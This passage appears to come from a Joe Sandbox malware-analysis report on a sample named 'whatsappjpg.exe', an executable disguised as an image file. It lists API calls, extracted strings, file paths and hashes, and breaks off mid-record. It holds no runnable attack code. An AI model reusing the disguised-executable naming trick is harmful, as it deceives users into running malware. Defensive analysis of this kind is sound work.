                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
                                                      • Instruction ID: 218267b357b67079b54de8dffa8c027c75f66e7c1ef01c1e874d3fe206bc0dcd
                                                      • Opcode Fuzzy Hash: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
                                                      • Instruction Fuzzy Hash: A3D0C9B7B181009BE750EFB9AE8985B73A8E7513297604C73D942F20A1D578D8028A79
                                                      APIs
                                                      • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,?), ref: 10001225
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: AllocGlobal
                                                      • String ID:
                                                      • API String ID: 3761449716-0
                                                      • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                      • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                      • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                      • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B31
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                                                      • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                                                      • DeleteObject.GDI32(00000000), ref: 00404C04
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                                                      • ShowWindow.USER32(?,00000005), ref: 00404D5E
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                                                      • GlobalFree.KERNEL32(?), ref: 00404F3E
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                                                      • InvalidateRect.USER32(?,00000000,?), ref: 0040508F
                                                      • ShowWindow.USER32(?,00000000), ref: 004050DD
                                                      • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                                                      • ShowWindow.USER32(00000000), ref: 004050EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 1638840714-813528018
                                                      • Opcode ID: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
                                                      • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                                                      • Opcode Fuzzy Hash: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
                                                      • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404617
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404641
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                                                      • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 0040472F
                                                      • lstrcatW.KERNEL32(?,Call), ref: 0040473B
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                                                        • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                                                        • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061DF
                                                        • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                        • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061F3
                                                        • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00406206
                                                      • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                                                      • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                      • String ID: A$C:\Users\user\Uploadable\normallnnens$Call$kS
                                                      • API String ID: 2246997448-3545763026
                                                      • Opcode ID: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
                                                      • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                                                      • Opcode Fuzzy Hash: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
                                                      • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                                                      APIs
                                                      • CoCreateInstance.OLE32(00407474,?,?,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                      Strings
                                                      • C:\Users\user\Uploadable\normallnnens, xrefs: 004020F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: C:\Users\user\Uploadable\normallnnens
                                                      • API String ID: 542301482-3974840194
                                                      • Opcode ID: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
                                                      • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
                                                      • Opcode Fuzzy Hash: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
                                                      • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
                                                      • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
                                                      • Opcode Fuzzy Hash: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
                                                      • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404368
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404399
                                                      • GetSysColor.USER32(?), ref: 004043AA
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                                                      • lstrlenW.KERNEL32(?), ref: 004043CB
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404446
                                                      • SendMessageW.USER32(00000000), ref: 0040444D
                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404478
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                                                      • SetCursor.USER32(00000000), ref: 004044CC
                                                      • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,?), ref: 004044E1
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                                                      • SetCursor.USER32(00000000), ref: 004044F0
                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 0040451F
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                      • String ID: AB@$Call$N$open$kS
                                                      • API String ID: 3615053054-866231313
                                                      • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                      • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                                                      • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                      • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                                                      APIs
                                                      • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C16
                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C3A
                                                      • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                                                        • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                        • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                      • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                                                      • wsprintfA.USER32 ref: 00405C7E
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                                                      • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                                                      • CloseHandle.KERNEL32(00000000), ref: 00405D76
                                                        • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00405B58
                                                        • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                      • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                      • API String ID: 1265525490-3322868524
                                                      • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                      • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                                                      • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                      • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                      • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                      • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                      • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                      APIs
                                                      • wsprintfW.USER32 ref: 100024E1
                                                      • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                        • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,76F8FFC0,100011AA,?,00000000), ref: 1000131E
                                                      • GlobalFree.KERNEL32(?), ref: 10002562
                                                      • GlobalFree.KERNEL32(00000000), ref: 1000258B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                      • String ID: s<u
                                                      • API String ID: 2435812281-779365171
                                                      • Opcode ID: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
                                                      • Instruction ID: c19482fd6b93636a14d77dfdabfb39ecfcb824cf15b2f076733b0032149e6b96
                                                      • Opcode Fuzzy Hash: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
                                                      • Instruction Fuzzy Hash: B13104B1405A06EFF621DFA4CC9492BBBBCFB403D6722491AF6419216DCB319C50DF64
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061DF
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061F3
                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00406206
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: "C:\Users\user\Desktop\whatsappjpg.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 589700163-2883303802
                                                      • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                      • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
